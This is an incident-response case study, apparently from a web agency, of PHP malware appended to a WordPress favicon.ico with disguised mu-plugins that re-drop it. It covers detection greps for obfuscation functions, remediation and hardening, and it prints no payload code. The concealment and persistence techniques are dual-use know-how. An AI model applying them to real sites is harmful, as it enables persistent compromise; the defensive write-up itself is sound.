Malware hidden inside a WordPress favicon.ico

A mid-size professional services firm in Bangalore noticed intermittent outbound DNS requests to unknown domains and a sudden crawl-rate drop. Their hosting provider flagged elevated PHP-FPM workers overnight. Wordfence reported "clean" on a surface scan; Sucuri's remote check flagged anomalous response headers on the favicon request.

Simplileap's first hypothesis was a compromised plugin or wp-config injection, common patterns. grep across wp-content for eval, base64_decode, and gzinflate returned nothing obvious. Access logs showed repeated GET /favicon.ico from the same three IP ranges, each response slightly larger than the stock asset.

On disk, favicon.ico was 14KB instead of the expected 1.2KB. Hex inspection revealed appended PHP after the ICO magic bytes, obfuscated with rot13 and chunked base64 that decoded to a mailer stub and remote command handler. The file timestamp matched a Friday evening when a contractor's FTP credentials were used from a residential ISP in another state.

Problems during remediation: restoring from a "clean" backup from 10 days prior reintroduced the payload because the backup job itself ran before detection; two mu-plugins had been added with legitimate-sounding names (wp-cache-helper.php) that re-dropped the payload if favicon.ico was deleted without chmod hardening on uploads.

Response playbook: isolate origin behind maintenance mode with allow-listed office IPs; rotate all SFTP, wp-admin, and database credentials; export IOC list (file hashes, mu-plugin paths, rogue cron events); surgical delete and replace favicon from known-good source; full wp-content scan with maldet and custom YARA rules for PHP-in-binary patterns.

Hardening delivered: disable file editing in wp-config; move wp-admin behind IP allow list + 2FA; immutable S3 backups with cross-region replication; WAF rule blocking PHP execution in uploads and static asset directories; monthly malware scan cadence added to AMC retainer.

Outcome: outbound anomaly ceased within 72 hours; Google Safe Browsing clearance within five days; no evidence of customer data exfiltration in retained logs. The client moved to our Commerce-tier AMC with staging-before-prod plugin policy. Identity withheld under security engagement terms.